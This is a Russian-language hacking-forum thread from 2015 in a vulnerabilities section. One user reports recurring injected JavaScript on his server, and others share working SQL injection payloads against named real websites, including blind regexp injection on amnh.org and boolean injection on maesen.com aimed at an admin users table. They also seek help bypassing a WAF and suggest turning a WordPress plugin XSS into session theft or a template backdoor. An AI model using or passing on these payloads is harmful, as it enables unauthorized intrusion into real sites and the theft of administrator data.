HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #24311  
Старый 07.04.2015, 04:04
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Есть сайт на VDS, на нем стал появлятся какой-то левый js-код в некоторых js-файлах. PHP-работал от того же юзера, что и на FTP, то есть имел полные права. Я удалил код, поискал шеллы - не нашел ничего, сменил пасс на ftp. Через несколько дней код снова появился. Обшарил все - шеллов не нашел, но были мои шеллы, я подумал что как-то через них может заливается чувак, сменил пассы на них, удалил код, права поменял, теперь php работает как nobody, на js-файлы теперь доступа нет. Через несколько дней снова код появился, я в ахуе. Проверяю логи apache - нет ничего подозрительного, проверяю логи панели vds - тоже ничего подозрительного. И что характерно, права на js-файл сменены на 777, то есть кто-то имеет доступ к аккаунту, что и ftp. Как это возможно? Как найти паразита?
 
Ответить с цитированием

  #24312  
Старый 07.04.2015, 04:17
5maks5
Guest
Сообщений: n/a
Провел на форуме:
168184

Репутация: 40
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:

Есть сайт на VDS, на нем стал появлятся какой-то левый js-код в некоторых js-файлах. PHP-работал от того же юзера, что и на FTP, то есть имел полные права. Я удалил код, поискал шеллы - не нашел ничего, сменил пасс на ftp. Через несколько дней код снова появился. Обшарил все - шеллов не нашел, но были мои шеллы, я подумал что как-то через них может заливается чувак, сменил пассы на них, удалил код, права поменял, теперь php работает как nobody, на js-файлы теперь доступа нет. Через несколько дней снова код появился, я в ахуе. Проверяю логи apache - нет ничего подозрительного, проверяю логи панели vds - тоже ничего подозрительного. И что характерно, права на js-файл сменены на 777, то есть кто-то имеет доступ к аккаунту, что и ftp. Как это возможно? Как найти паразита?
Очевидно, троян на вашем компьютере.

Айболитом не проверяли?
 
Ответить с цитированием

  #24313  
Старый 07.04.2015, 04:29
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от 5maks5  
5maks5 said:

Очевидно, троян на вашем компьютере.
Айболитом не проверяли?
Троян теоретически возможен. Но windows security essentials молчит, да и в автозагрузке ничего подозрительного.
 
Ответить с цитированием

  #24314  
Старый 07.04.2015, 09:57
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

 
Ответить с цитированием

  #24315  
Старый 07.04.2015, 10:52
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Код:
Code:
http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=5,1,%27(%27))*/+--+    TRUE

http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=4,1,%27(%27))*/+--+  FALSE
Извращенский вариант, но имеет право на жизнь

// YaBtr: Regexp
 
Ответить с цитированием

  #24316  
Старый 07.04.2015, 10:52
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #24317  
Старый 07.04.2015, 22:05
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Код:
Code:
https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=1 - TRUE
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=1 - TRUE
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=0 - FALSE
https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=0 - FALSE
не могу waf обойти, есть варианты?

PS

Код:
Code:
http://www.maesen.com/sexshop/video_web.php?video=(88886635)or+1=(SELECT+TOP+1+'id'+FROM+adminusuarios)
с information_schema.tables вытащить имя колонок с таблицы adminusuarios не получается, при использовании "_" пишет нет такой директори
 
Ответить с цитированием

  #24318  
Старый 10.04.2015, 10:29
larinvlad
Guest
Сообщений: n/a
Провел на форуме:
4520

Репутация: 0
По умолчанию

Сканировал с помощью акунетикса: /wp-content/plugins/gd-star-rating/ajax.php

Нашел XSS, написано:

asr.84391.0.7.1428069437.10.0.30.3.3.0'"()&%prompt (973439)

Как его использовать? И даст ли это возможность доступа к бд ?

Раскручивать sql немного умею, но здесь не знаю куда копать.
 
Ответить с цитированием

  #24319  
Старый 10.04.2015, 11:33
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от larinvlad  
larinvlad said:

Сканировал с помощью акунетикса: /wp-content/plugins/gd-star-rating/ajax.php
Нашел XSS, написано:
asr.84391.0.7.1428069437.10.0.30.3.3.0'"()&%prompt (973439)
Как его использовать? И даст ли это возможность доступа к бд ?
Раскручивать sql немного умею, но здесь не знаю куда копать.
Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
 
Ответить с цитированием

  #24320  
Старый 10.04.2015, 12:28
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
Ты ему не помог, ему нужно раскрутить sql через xss .
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ